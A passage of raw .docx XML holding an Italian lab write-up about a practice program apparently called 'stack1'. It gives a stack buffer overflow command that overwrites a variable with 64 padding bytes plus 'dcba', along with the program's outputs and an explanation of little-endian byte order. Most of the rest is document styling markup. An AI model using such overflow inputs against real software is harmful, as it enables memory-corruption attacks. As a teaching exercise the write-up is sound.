      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0x63</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">(‘c’)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0x64</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">(‘d’)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; si riempie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">modified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Il possibile input potrebbe essere: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/stack1 $(python - "print 'a'*64 + 'abcd' ")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="ff0000"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Try again, you got 0x64636261</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="ff0000"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">L'input, seppur inserito in ordine rispetto al codice del programma, viene al rovescio nell'output del programma </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:bCs/>
          <w:i/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Input: 0x61626364 ('abcd')</w:t>
      </w:r>
      <w:r/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Output: 0x64636261 ('dcba')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Questo perchè </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è il processore ad organizzare in memoria il numero intero del formato strano appena visto. L'architettura Intel è </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Little Endian</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il bit meno significativo di una parola è salvato al primo byte puntato dall'indirizzo della parola stessa. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Di conseguenza, la parola </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0x61626364</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> immessa tramite i quattro caratteri '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">abcd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">' è organizzata con il byte meno significativo per primo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0x64636261</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, corrispondente alla stringa '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">dcba</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">'.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Il comando corretto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> è</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/stack1 $(python - "print 'a'*64 + 'dcba' ")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00b050"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="00b050"/>
        </w:rPr>
        <w:t xml:space="preserve">you have correctly got the variable to the right value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00b050"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>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panose1 w:val="0204050305040603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v"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2149" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings" w:eastAsia="Wingdings" w:cs="Wingdings"/>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v"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="709" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings" w:eastAsia="Wingdings" w:cs="Wingdings"/>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ü"/>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ü"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="709"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09" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="§"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1429" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings" w:eastAsia="Wingdings" w:cs="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="·"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2149" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2869" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="§"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3589" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings" w:eastAsia="Wingdings" w:cs="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="·"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4309" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5029" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="§"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5749"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9">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="v"/>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0">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="v"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="709"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2">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="888"/>
    <w:next w:val="888"/>
    <w:link w:val="713"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepLines/>
      <w:keepNext/>
      <w:spacing w:before="480" w:after="200"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="713">
    <w:name w:val="Heading 1 Char"/>
    <w:link w:val="712"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="714">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="888"/>
    <w:next w:val="888"/>
    <w:link w:val="715"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepLines/>
      <w:keepNext/>
      <w:spacing w:before="360" w:after="200"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="34"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="715">
    <w:name w:val="Heading 2 Char"/>
    <w:link w:val="714"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="34"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="716">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="888"/>
    <w:next w:val="888"/>
    <w:link w:val="717"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepLines/>
      <w:keepNext/>
      <w:spacing w:before="320" w:after="200"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="717">
    <w:name w:val="Heading 3 Char"/>
    <w:link w:val="716"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="718">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="888"/>
    <w:next w:val="888"/>
    <w:link w:val="719"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepLines/>
      <w:keepNext/>
      <w:spacing w:before="320" w:after="200"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="719">
    <w:name w:val="Heading 4 Char"/>
    <w:link w:val="718"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="720">
    <w:name w:val="Heading 5"/>
    <w:basedOn w:val="888"/>
    <w:next w:val="888"/>
    <w:link w:val="721"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepLines/>
      <w:keepNext/>
      <w:spacing w:before="320" w:after="200"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="721">
    <w:name w:val="Heading 5 Char"/>
    <w:link w:val="720"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="722">
    <w:name w:val="Heading 6"/>
    <w:basedOn w:val="888"/>
    <w:next w:val="888"/>
    <w:link w:val="723"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepLines/>
      <w:keepNext/>
      <w:spacing w:before="320" w:after="200"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="723">
    <w:name w:val="Heading 6 Char"/>
    <w:link w:val="722"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="724">
    <w:name w:val="Heading 7"/>
    <w:basedOn w:val="888"/>
    <w:next w:val="888"/>
    <w:link w:val="725"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepLines/>
      <w:keepNext/>
      <w:spacing w:before="320" w:after="200"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="725">
    <w:name w:val="Heading 7 Char"/>
    <w:link w:val="724"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="726">
    <w:name w:val="Heading 8"/>
    <w:basedOn w:val="888"/>
    <w:next w:val="888"/>
    <w:link w:val="727"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepLines/>
      <w:keepNext/>
      <w:spacing w:before="320" w:after="200"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="727">
    <w:name w:val="Heading 8 Char"/>
    <w:link w:val="726"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="728">
    <w:name w:val="Heading 9"/>
    <w:basedOn w:val="888"/>
    <w:next w:val="888"/>
    <w:link w:val="729"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepLines/>
      <w:keepNext/>
      <w:spacing w:before="320" w:after="200"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="729">
    <w:name w:val="Heading 9 Char"/>
    <w:link w:val="728"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="730">
    <w:name w:val="Title"/>
    <w:basedOn w:val="888"/>
    <w:next w:val="888"/>
    <w:link w:val="731"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:pPr>
      <w:contextualSpacing/>
      <w:spacing w:before="300" w:after="200"/>
    </w:pPr>
    <w:rPr>
